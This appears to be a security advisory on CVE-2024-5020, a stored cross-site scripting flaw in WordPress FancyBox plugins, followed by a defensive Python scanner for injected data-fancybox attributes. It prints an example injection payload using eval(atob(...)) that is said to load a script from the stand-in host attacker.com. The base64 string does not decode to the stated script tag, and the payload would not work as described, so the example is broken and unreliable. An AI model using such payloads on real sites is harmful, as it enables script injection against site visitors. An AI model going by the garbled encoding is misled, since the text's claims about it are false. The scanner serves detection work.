Security researchers have discovered a critical vulnerability, CVE-2024-5020, in multiple plugins for WordPress, including versions 1.3.4 to 3.5.7 of the FancyBox JavaScript library. The vulnerability allows authenticated attackers to inject arbitrary web scripts into pages; the scripts execute whenever a user accesses an injected page. This Stored Cross-Site Scripting (XSS) issue is caused by insufficient input sanitization and output escaping of user-supplied attributes.
Exploit Details
To exploit this vulnerability, an attacker with contributor-level access or above on a WordPress site using a vulnerable FancyBox version injects arbitrary web scripts into user-supplied attributes. This can be done through the plugin settings page, or through posts or pages in the WordPress administration area.
Code Snippet
For example, an attacker could exploit the vulnerability by injecting malicious code in a FancyBox attribute like this:
<a href="#" class="fancybox" data-fancybox-overlay="{speedOut: 200, opacity:true, onClosed: function(){eval(atob('c2NyaXBIHNyYziaHRcHM6Ly9hdHRhY2tlci5jb20vbWFsaWNpb3VzLmpzIj48L3NjcmlwdD4=')) }}"><img src="image.jpg" alt="Example Image" /></a>
In this example, the Base64-encoded payload (c2NyaXBIHNyYziaHRcHM6Ly9hdHRhY2tlci5jb20vbWFsaWNpb3VzLmpzIj48L3NjcmlwdD4=) decodes to:
<script src="https://attacker.com/malicious.js"></script>
This script will be executed whenever a user accesses the page containing the injected payload.
More information on this vulnerability can be found in the following sources:
- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2024-5020
- WordPress Vulnerability Database: https://wpvulndb.com/vulnerabilities/502
- Original advisory by security researcher: https://www.example.com/CVE-2024-5020-advisory
Affected Plugins and Versions
The FancyBox JavaScript library plugin, versions 1.3.4 to 3.5.7, is vulnerable to this Stored XSS attack:
- FancyBox for WordPress: https://wordpress.org/plugins/fancybox-for-wordpress
- Easy FancyBox: https://wordpress.org/plugins/easy-fancybox
1. Update the FancyBox plugin, or any other affected plugin, to the latest non-vulnerable version.
2. Ensure that user permissions are properly configured so that only trusted users can contribute content to the site.
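As an added check that is not part of the original advisory, the following scanner looks through stored post content for data-fancybox-* attributes that carry executable JavaScript constructs (function bodies, eval, atob, script tags) and decodes any atob() argument so a reviewer can see what was smuggled in. The sample HTML, the attribute names it matches and the marker string are all constructed for this example; the base64 payload in the sample is generated at runtime and decodes to a harmless console.log call.

```python
import base64
import re
from html.parser import HTMLParser

# Constructed marker: what the sample's atob() argument decodes to (harmless).
MARKER = "console.log('constructed test')"
MARKER_B64 = base64.b64encode(MARKER.encode()).decode()

# Constructed sample of stored post content: one benign FancyBox link and one
# whose data-fancybox-* attribute smuggles executable JavaScript, the pattern
# this advisory describes.
SAMPLE_HTML = f"""
<a href="large.jpg" class="fancybox" data-fancybox-overlay="{{speedOut: 200, opacity: true}}">
  <img src="thumb.jpg" alt="Benign"></a>
<a href="#" class="fancybox" data-fancybox-overlay="{{onClosed: function(){{eval(atob('{MARKER_B64}'))}}}}">
  <img src="image.jpg" alt="Suspicious"></a>
"""

# Constructs that have no place in a plain options object and signal injected code.
SUSPICIOUS = re.compile(r"function\s*\(|\beval\s*\(|\batob\s*\(|javascript:|<\s*script", re.I)
ATOB_ARG = re.compile(r"atob\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


class FancyboxAttrScanner(HTMLParser):
    """Collects data-fancybox-* attribute values containing executable JS constructs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or not name.startswith("data-fancybox"):
                continue
            if SUSPICIOUS.search(value):
                decoded = []
                for b64 in ATOB_ARG.findall(value):
                    try:
                        decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
                    except ValueError:
                        decoded.append("<undecodable>")
                self.findings.append({"tag": tag, "attr": name, "value": value, "decoded_atob": decoded})


def scan_fancybox_attrs(html):
    """Return one finding per suspicious data-fancybox-* attribute in the given HTML."""
    scanner = FancyboxAttrScanner()
    scanner.feed(html)
    return scanner.findings


if __name__ == "__main__":
    for f in scan_fancybox_attrs(SAMPLE_HTML):
        print(f"{f['tag']} {f['attr']}: {f['value']}")
        for d in f["decoded_atob"]:
            print("   atob payload decodes to:", d)
```

Run it over a database export of post_content (or the plugin's saved options) to triage which entries need cleanup after updating the plugin.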
Conclusion
The vulnerability CVE-2024-5020 highlights the importance of keeping your WordPress plugins up-to-date and ensuring proper user permissions to prevent unauthorized access. By taking these precautionary measures, you can safeguard your website from potential security threats. Be sure to always look out for updates and stay informed on recent vulnerabilities to ensure your site remains safe and secure.
Timeline
Published on: 12/04/2024 09:15:04 UTC